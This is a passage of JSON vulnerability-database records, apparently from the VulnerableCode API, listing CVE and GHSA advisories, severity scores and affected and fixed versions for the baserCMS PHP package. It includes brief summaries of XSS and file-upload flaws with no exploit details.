suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-p6nr-eu91-53b4"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-r4jc-22rq-d3cb"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-twf5-bzba-gqb4"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-vqx2-hzju-r7et"},{"vulnerability":"VCID-wvnk-63hy-ykeq"},{"vulnerability":"VCID-xpsb-2yux-g3cf"},{"vulnerability":"VCID-xxud-7jsh-bbc1"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-yesf-qxgy-3ygx"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"},{"vulnerability":"VCID-zy68-bur9-1fck"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.0.5.1"},{"url":"http://public2.
vulnerablecode.io/api/packages/54021?format=json","purl":"pkg:composer/baserproject/basercms@4.0.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1q79-sxzp-zker"},{"vulnerability":"VCID-2u6y-aj6t-7fb1"},{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-6trr-5deb-yydm"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-9mf7-56fh-fyfk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-d5gk-q2hh-kba5"},{"vulnerability":"VCID-e4xa-jm9u-nked"},{"vulnerability":"VCID-eq7f-n3g5-s3hu"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ga9u-uv9b-tydr"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-gsg3-fdmu-vqag"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-p6nr-eu91-53b4"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-r4jc-22rq-d3cb"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-twf5-bzba-gqb4"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-vqx2-hzju-r7et"},{"vulnerability":"VCID-wvnk-63hy-ykeq"},{"vulnerability":"VCID-xpsb-2yux-g3cf"},{"vulnerability":"VCID-xxud-7jsh-bbc1"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-yesf-qxgy-3ygx"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"},{"vulnerability":"VCID-zy68-bur9-1fck"}],"resour
ce_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.0.6"}],"aliases":["CVE-2017-10844","GHSA-69gw-v5ph-6vxq"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-y9f3-k7xk-rucf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91645?format=json","vulnerability_id":"VCID-zqd4-rdem-jfgk","summary":"baserCMS has a cross-site scripting vulnerability in blog posts.\n\n### Target\nbaserCMS 5.2.1 and earlier versions\n\n### Vulnerability\n\nMalicious Javascript may be executed in blog posts.\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\nPlease refer to the following page to reference for more information.\nhttps://basercms.net/security/JVN_20837860\n\n### Credits\n\nGai Tanaka@Mitsui Bussan Secure Directions, Inc.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-30879","reference_id":"","reference_type":"","scores":[{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01615","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-30879"},{"reference_url":"https://basercms.net/security/JVN_20837860","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/"}],"url":"https://basercms.net/security/JVN_20837860"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://
github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/releases/tag/5.2.3","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/"}],"url":"https://github.com/baserproject/basercms/releases/tag/5.2.3"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-jmq3-x8q7-j9qm","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-jmq3-x8q7-j9qm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-30879","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-30879"},{"reference_url":"https://github.com/advisories/GHSA-jmq3-x8q7-j9qm","reference_id":"GHSA-jmq3-x8q7-j9qm","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-jmq3-x8q7-j9qm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112578?format=json","purl":"pkg:composer/baserproject/basercms@5.2.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"}],"ali
ases":["CVE-2026-30879","GHSA-jmq3-x8q7-j9qm"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zqd4-rdem-jfgk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/44709?format=json","vulnerability_id":"VCID-zsgc-fnen-b7a6","summary":"Unrestricted Upload of File with Dangerous Type\nbaserCMS is a Content Management system. Prior to version 4.7.5, any file may be uploaded on the management system of baserCMS. Version 4.7.5 contains a patch.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-25655","reference_id":"","reference_type":"","scores":[{"value":"0.00561","scoring_system":"epss","scoring_elements":"0.68669","published_at":"2026-06-04T12:55:00Z"},{"value":"0.00561","scoring_system":"epss","scoring_elements":"0.6871","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-25655"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/commit/922025a98b0e697ab78f6a785a004e0729aa9100","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/"}],"url":"https://github.com/baserproject/basercms/commit/922025a98b0e697ab78f6a785a004e0729aa9100"},{"reference_url":"https://github.com/baserproject/basercms/commit/9297629983ed908c7f51bf61a0231dde91404ebd","reference_id":"","re
ference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/"}],"url":"https://github.com/baserproject/basercms/commit/9297629983ed908c7f51bf61a0231dde91404ebd"},{"reference_url":"https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/"}],"url":"https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-25655","reference_id":"CVE-2023-25655","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-25655"},{"reference_url":"https://github.com/advisories/GHSA-mfvg-qwcw-qvc8","reference_id":"GHSA-mfvg-qwcw-qvc8","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-mfvg-qwcw-qvc8"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-mfvg-qwcw-qvc8","reference_id":"GHSA-mfvg-qwcw-qvc8","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z
/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-mfvg-qwcw-qvc8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/64369?format=json","purl":"pkg:composer/baserproject/basercms@4.7.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zxns-tzw3-27fr"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.5"}],"aliases":["CVE-2023-25655","GHSA-mfvg-qwcw-qvc8"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zsgc-fnen-b7a6"}],"fixing_vulnerabilities":[],"risk_score":"4.5","resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.0.0"}